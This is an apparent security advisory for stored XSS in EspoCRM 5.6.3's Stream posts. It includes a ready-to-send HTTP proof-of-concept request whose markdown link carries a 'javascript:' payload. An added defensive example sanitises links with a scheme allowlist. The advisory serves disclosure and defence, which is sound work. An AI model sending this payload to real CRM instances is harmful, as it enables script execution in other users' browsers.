The current version of EspoCRM, 5.6.3, is vulnerable to stored XSS because user-supplied data in Stream messages is not filtered. A malicious attacker can create a specially crafted link containing JavaScript code and assign it to any user in the system. After the link is clicked, the JavaScript code is executed in that user's browser.
PoC
Make the following request (insert your authentication data and hostname):
POST /api/v1/Note HTTP/1.1
Host: <PASTE YOUR HOSTNAME HERE>
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Authorization: Basic <PASTE YOUR AUTH TOKEN HERE>
Espo-Authorization: <PASTE YOUR AUTH TOKEN HERE>
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Content-Length: 108
Cookie: <PASTE YOUR COOKIE HERE>

{"type":"Post","targetType":"self","post":"[test](javascript:alert(document.domain%29)","attachmentsIds":[]}
Then open the notifications and click the link.
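The root cause is that the markdown-style link in the Stream post is turned into an anchor without checking the URL scheme, so a `javascript:` URL becomes a clickable link. The following is an added example of the defensive rendering step, not EspoCRM's own code: `safeHref` and `renderStreamPost` are hypothetical names, and the only scheme allowlist (http, https, mailto) is an assumption. It relies on the WHATWG URL parser, which already normalises tabs, newlines and case in the scheme, so the allowlist check cannot be bypassed by obfuscating the scheme.

```javascript
// Added example, not part of EspoCRM: render a Stream post so that only
// links with an allowlisted scheme become clickable. The payload from the
// report above ("[test](javascript:alert(document.domain%29)") renders as
// plain text "test" with no href at all.

// Assumed allowlist; adjust to what the application actually needs.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Returns a normalised absolute URL if its scheme is allowlisted, else null.
// `new URL` applies WHATWG parsing: it strips tabs/newlines and lower-cases
// the scheme, so "java\tscript:" or "JAVASCRIPT:" still resolve to
// "javascript:" and are rejected; relative or malformed input throws and is
// treated as "not a link".
function safeHref(rawUrl) {
  let parsed;
  try {
    parsed = new URL(rawUrl);
  } catch (e) {
    return null;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Markdown-style link: [label](url). The URL part stops at whitespace or the
// first ")" so "alert(document.domain%29" is captured as the URL body.
const LINK_RE = /\[([^\]]*)\]\(([^)\s]*)\)/g;

// Render a Stream post to HTML. Plain text is escaped; links are emitted only
// when safeHref accepts the URL, otherwise just the escaped label is kept.
function renderStreamPost(post) {
  let html = "";
  let last = 0;
  for (const m of post.matchAll(LINK_RE)) {
    html += escapeHtml(post.slice(last, m.index));
    const label = escapeHtml(m[1]);
    const href = safeHref(m[2]);
    html += href !== null
      ? `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${label}</a>`
      : label; // unsafe or non-absolute URL: keep the text, drop the link
    last = m.index + m[0].length;
  }
  return html + escapeHtml(post.slice(last));
}

// Constructed sample inputs: the reported payload and a benign post.
const REPORTED_PAYLOAD = "[test](javascript:alert(document.domain%29)";
const BENIGN_POST = "see [docs](https://example.com/x) <b>";

module.exports = { safeHref, renderStreamPost, escapeHtml, REPORTED_PAYLOAD, BENIGN_POST };
```

The scheme check is done on the parsed URL rather than on the raw string so that the decision matches what the browser will actually navigate to; a denylist of `javascript:` alone would miss the encoded and whitespace-padded variants the parser normalises away.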